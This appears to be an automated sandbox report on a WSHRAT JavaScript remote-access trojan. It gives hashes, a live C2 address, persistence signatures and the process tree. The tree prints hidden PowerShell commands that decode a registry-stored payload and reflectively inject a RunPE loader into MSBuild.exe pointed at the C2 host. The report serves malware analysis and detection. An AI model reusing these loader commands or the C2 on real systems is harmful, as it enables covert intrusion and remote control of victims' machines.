Overview

overview

10

Static

static

1

Sdk283724711.js

windows7-x64

10

Sdk283724711.js

windows10-2004-x64

10

Analysis

  • max time kernel
    144s
  • max time network
    148s
  • platform
    windows7_x64
  • resource
    win7-20230831-en
  • resource tags

    arch:x64arch:x86image:win7-20230831-enlocale:en-usos:windows7-x64system
  • submitted
    05-09-2023 23:41

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Sdk283724711.js

  • Size

    963KB

  • MD5

    a577b3a40efbcfb8b749ac033f1a7a71

  • SHA1

    2dd22a217b5faec549b6a948a6d1f75c5114c485

  • SHA256

    1d96c9a57ad378deea20d2e275d5cc70692e2fb673d311ff3e101e695cf979eb

  • SHA512

    62eb4a174a8da9cbb5958b0b71d76136a6d52de8a8b54fe2437d714337fdce6f803fba6318f3dee80cc0d8d31119adf7af934833dce9b93b992156b70f4fbde5

  • SSDEEP

    6144:MQSBV1i/yLD9YI1kBs8WL5y6P3uXjRAE2CGMNygiAN2nKrptY/Q0H+kIM4TdwQbW:Xz+

Score
10/10
wshratpersistencetrojan

Malware Config

Extracted

Family

wshrat

C2

http://2.59.254.111:2420

Signatures

  • WSHRAT

    WSHRAT is a variant of Houdini worm and has vbs and js variants.

    trojanwshrat
  • Blocklisted process makes network request 6 IoCs
  • Drops startup file 2 IoCs
  • Adds Run key to start application 2 TTPs 4 IoCs
    persistence
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Script User-Agent 4 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 22 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence
  • Uses Volume Shadow Copy WMI provider

    The Volume Shadow Copy service is used to manage backups/snapshots.

    ransomware
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

    ransomware

Processes

  • C:\Windows\system32\wscript.exe
    wscript.exe C:\Users\Admin\AppData\Local\Temp\Sdk283724711.js
    1⤵
    • Drops startup file
    • Adds Run key to start application
    • Suspicious use of WriteProcessMemory
    PID:3040
    • C:\Windows\System32\wscript.exe
      "C:\Windows\System32\wscript.exe" //B "C:\Users\Admin\AppData\Roaming\Sdk283724711.js"
      2⤵
      • Blocklisted process makes network request
      • Drops startup file
      • Adds Run key to start application
      • Suspicious use of WriteProcessMemory
      PID:2648
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -Command "$Cli444 = (get-itemproperty -path 'HKCU:\SOFTWARE\Microsoft\' -name 'test').test;$Abt = [Convert]::FromBase64String($Cli444);$inputz = New-Object System.IO.MemoryStream( , $Abt );[System.IO.MemoryStream] $output = New-Object System.IO.MemoryStream;$gzipStream = New-Object System.IO.Compression.GzipStream $inputz, ([IO.Compression.CompressionMode]::Decompress);$buffer = New-Object byte[](1024);while($true){$read = $gzipStream.Read($buffer, 0, 1024);if ($read -le 0){break;}$output.Write($buffer, 0, $read);};$gzipStream.Close();$inputz.Close();$Out = $output.ToArray();$output.Close();$Out = [Convert]::ToBase64String($Out);new-itemproperty -path 'HKCU:\SOFTWARE\Microsoft' -name 'test' -value $Out -propertytype string -force | out-null;"
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2516
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -Command "$Cli444 = (get-itemproperty -path 'HKCU:\SOFTWARE\Microsoft\' -name 'test').test;$Abt = [Convert]::FromBase64String($Cli444);$inputz = New-Object System.IO.MemoryStream( , $Abt );[System.IO.MemoryStream] $output = New-Object System.IO.MemoryStream;$gzipStream = New-Object System.IO.Compression.GzipStream $inputz, ([IO.Compression.CompressionMode]::Decompress);$buffer = New-Object byte[](1024);while($true){$read = $gzipStream.Read($buffer, 0, 1024);if ($read -le 0){break;}$output.Write($buffer, 0, $read);};$gzipStream.Close();$inputz.Close();$Out = $output.ToArray();$output.Close();$Out = [Convert]::ToBase64String($Out);new-itemproperty -path 'HKCU:\SOFTWARE\Microsoft' -name 'test' -value $Out -propertytype string -force | out-null;"
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2180
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -Command "$Cli444 = (get-itemproperty -path 'HKCU:\SOFTWARE\Microsoft\' -name 'mPluginC').mPluginC;$Cli555 = (get-itemproperty -path 'HKCU:\SOFTWARE\Microsoft\' -name 'mRunPE').mRunPE;$Abt = [System.Reflection.Assembly]::Load([Convert]::FromBase64String($Cli555)).GetType('k.k.Hackitup').GetMethod('exe').Invoke($null,[object[]] ('MSBuild.exe',[Convert]::FromBase64String($Cli444),'2.59.254.111 2420 \"WSHRAT|ECCD33FC|ZWKQHIWB|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 5/9/2023|JavaScript-v3.4|NL:Netherlands\" 1'));"
        3⤵
        • Suspicious use of SetThreadContext
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2096
        • C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe
          path 2.59.254.111 2420 "WSHRAT|ECCD33FC|ZWKQHIWB|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 5/9/2023|JavaScript-v3.4|NL:Netherlands" 1
          4⤵
          • Suspicious use of SetWindowsHookEx
          PID:2780

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
    Filesize

    7KB

    MD5

    803f409e2f2b46ca96ce93a90194312b

    SHA1

    0e6a14f06a0a03f8765bea4feb998340493e9ab2

    SHA256

    d6717d44f1c3fe446b36ee8e239e86a5f234daf0bf929267c6d9c3195c023798

    SHA512

    67cebd4b316f3e795109727948a27eb56df42d2a35288ebb42a7ed4322d6277a4e096b6d53ceb39b5f2ea2c9ac1b9d555c8c0defd38f489b12053642f6395b89

    Download Submit

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
    Filesize

    7KB

    MD5

    803f409e2f2b46ca96ce93a90194312b

    SHA1

    0e6a14f06a0a03f8765bea4feb998340493e9ab2

    SHA256

    d6717d44f1c3fe446b36ee8e239e86a5f234daf0bf929267c6d9c3195c023798

    SHA512

    67cebd4b316f3e795109727948a27eb56df42d2a35288ebb42a7ed4322d6277a4e096b6d53ceb39b5f2ea2c9ac1b9d555c8c0defd38f489b12053642f6395b89

    Download Submit

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\5XS8FWNUF28MWK8G846D.temp
    Filesize

    7KB

    MD5

    803f409e2f2b46ca96ce93a90194312b

    SHA1

    0e6a14f06a0a03f8765bea4feb998340493e9ab2

    SHA256

    d6717d44f1c3fe446b36ee8e239e86a5f234daf0bf929267c6d9c3195c023798

    SHA512

    67cebd4b316f3e795109727948a27eb56df42d2a35288ebb42a7ed4322d6277a4e096b6d53ceb39b5f2ea2c9ac1b9d555c8c0defd38f489b12053642f6395b89

    Download Submit

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sdk283724711.js
    Filesize

    963KB

    MD5

    a577b3a40efbcfb8b749ac033f1a7a71

    SHA1

    2dd22a217b5faec549b6a948a6d1f75c5114c485

    SHA256

    1d96c9a57ad378deea20d2e275d5cc70692e2fb673d311ff3e101e695cf979eb

    SHA512

    62eb4a174a8da9cbb5958b0b71d76136a6d52de8a8b54fe2437d714337fdce6f803fba6318f3dee80cc0d8d31119adf7af934833dce9b93b992156b70f4fbde5

    Download Submit

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sdk283724711.js
    Filesize

    963KB

    MD5

    a577b3a40efbcfb8b749ac033f1a7a71

    SHA1

    2dd22a217b5faec549b6a948a6d1f75c5114c485

    SHA256

    1d96c9a57ad378deea20d2e275d5cc70692e2fb673d311ff3e101e695cf979eb

    SHA512

    62eb4a174a8da9cbb5958b0b71d76136a6d52de8a8b54fe2437d714337fdce6f803fba6318f3dee80cc0d8d31119adf7af934833dce9b93b992156b70f4fbde5

    Download Submit

  • C:\Users\Admin\AppData\Roaming\Sdk283724711.js
    Filesize

    963KB

    MD5

    a577b3a40efbcfb8b749ac033f1a7a71

    SHA1

    2dd22a217b5faec549b6a948a6d1f75c5114c485

    SHA256

    1d96c9a57ad378deea20d2e275d5cc70692e2fb673d311ff3e101e695cf979eb

    SHA512

    62eb4a174a8da9cbb5958b0b71d76136a6d52de8a8b54fe2437d714337fdce6f803fba6318f3dee80cc0d8d31119adf7af934833dce9b93b992156b70f4fbde5

    Download Submit

  • C:\Users\Admin\AppData\Roaming\wshsdk.zip
    Filesize

    12.4MB

    MD5

    d9a63dfd8b73629421bb44bcde09f312

    SHA1

    7855575c12eaee0e734f3901ca1da2931e9b587a

    SHA256

    9d5bb028794410fda9d1b3e0f8deb6beee5bd4e1e55340bd375a209c81dc98eb

    SHA512

    df195c22f7818569cc92e995846ab507caa30f341ac902cc8afe6f06ae4493709e7f80357c91cf14b21e58e2154e0b35f2154d8a313bf36fcff0b72b3a539cf8

    Download Submit

  • C:\Users\Admin\AppData\Roaming\wshsdk\Lib\SITE-P~1\adodbapi\test\is64bit.py
    Filesize

    1KB

    MD5

    ca2cc8e73bbca371935bbc92ed18d567

    SHA1

    1adb458919e842cd78c72b1ff00e5e93cb6ef75e

    SHA256

    bea3f797921992fda45c19db41e10e3b325bcdd3ea35d35c1fa70535477ad9c1

    SHA512

    b63df3bad9272f45ba0f50e2c50aaed7a04eb1b000d5855d9f3a8e5c5f2d381c667b1e9c1e1f03f80584a7941a96992838664ae9dd25e1b8320e026da35b8223

    Download Submit

  • memory/2096-62-0x000007FEF4A40000-0x000007FEF53DD000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2096-43-0x0000000002620000-0x00000000026A0000-memory.dmp

    Filesize

    512KB

    Download

  • memory/2096-41-0x0000000002620000-0x00000000026A0000-memory.dmp

    Filesize

    512KB

    Download

  • memory/2096-44-0x0000000002620000-0x00000000026A0000-memory.dmp

    Filesize

    512KB

    Download

  • memory/2096-45-0x00000000027E0000-0x00000000027EA000-memory.dmp

    Filesize

    40KB

    Download

  • memory/2096-39-0x000007FEF4A40000-0x000007FEF53DD000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2096-42-0x0000000002620000-0x00000000026A0000-memory.dmp

    Filesize

    512KB

    Download

  • memory/2096-40-0x000007FEF4A40000-0x000007FEF53DD000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2180-25-0x000000001B350000-0x000000001B632000-memory.dmp

    Filesize

    2.9MB

    Download

  • memory/2180-29-0x000007FEF4140000-0x000007FEF4ADD000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2180-30-0x0000000002950000-0x00000000029D0000-memory.dmp

    Filesize

    512KB

    Download

  • memory/2180-31-0x0000000002950000-0x00000000029D0000-memory.dmp

    Filesize

    512KB

    Download

  • memory/2180-32-0x0000000002950000-0x00000000029D0000-memory.dmp

    Filesize

    512KB

    Download

  • memory/2180-33-0x000007FEF4140000-0x000007FEF4ADD000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2180-27-0x000007FEF4140000-0x000007FEF4ADD000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2180-26-0x00000000026E0000-0x00000000026E8000-memory.dmp

    Filesize

    32KB

    Download

  • memory/2180-28-0x0000000002950000-0x00000000029D0000-memory.dmp

    Filesize

    512KB

    Download

  • memory/2516-14-0x000007FEF4AE0000-0x000007FEF547D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2516-18-0x000007FEF4AE0000-0x000007FEF547D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2516-17-0x0000000002410000-0x0000000002490000-memory.dmp

    Filesize

    512KB

    Download

  • memory/2516-16-0x0000000002410000-0x0000000002490000-memory.dmp

    Filesize

    512KB

    Download

  • memory/2516-15-0x0000000002410000-0x0000000002490000-memory.dmp

    Filesize

    512KB

    Download

  • memory/2516-12-0x000000001B260000-0x000000001B542000-memory.dmp

    Filesize

    2.9MB

    Download

  • memory/2516-19-0x000007FEF4AE0000-0x000007FEF547D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2516-13-0x00000000025E0000-0x00000000025E8000-memory.dmp

    Filesize

    32KB

    Download

  • memory/2780-56-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

    Filesize

    4KB

    Download

  • memory/2780-54-0x0000000000400000-0x000000000040E000-memory.dmp

    Filesize

    56KB

    Download

  • memory/2780-52-0x0000000000400000-0x000000000040E000-memory.dmp

    Filesize

    56KB

    Download

  • memory/2780-50-0x0000000000400000-0x000000000040E000-memory.dmp

    Filesize

    56KB

    Download

  • memory/2780-48-0x0000000000400000-0x000000000040E000-memory.dmp

    Filesize

    56KB

    Download

  • memory/2780-46-0x0000000000400000-0x000000000040E000-memory.dmp

    Filesize

    56KB

    Download

  • memory/2780-59-0x0000000000400000-0x000000000040E000-memory.dmp

    Filesize

    56KB

    Download

  • memory/2780-63-0x0000000073C50000-0x00000000741FB000-memory.dmp

    Filesize

    5.7MB

    Download

  • memory/2780-65-0x0000000000A10000-0x0000000000A50000-memory.dmp

    Filesize

    256KB

    Download

  • memory/2780-64-0x0000000073C50000-0x00000000741FB000-memory.dmp

    Filesize

    5.7MB

    Download

  • memory/2780-69-0x0000000073C50000-0x00000000741FB000-memory.dmp

    Filesize

    5.7MB

    Download

  • memory/2780-70-0x0000000000A10000-0x0000000000A50000-memory.dmp

    Filesize

    256KB

    Download

  • memory/2780-61-0x0000000000400000-0x000000000040E000-memory.dmp

    Filesize

    56KB

    Download

  • memory/2780-57-0x0000000000400000-0x000000000040E000-memory.dmp

    Filesize

    56KB

    Download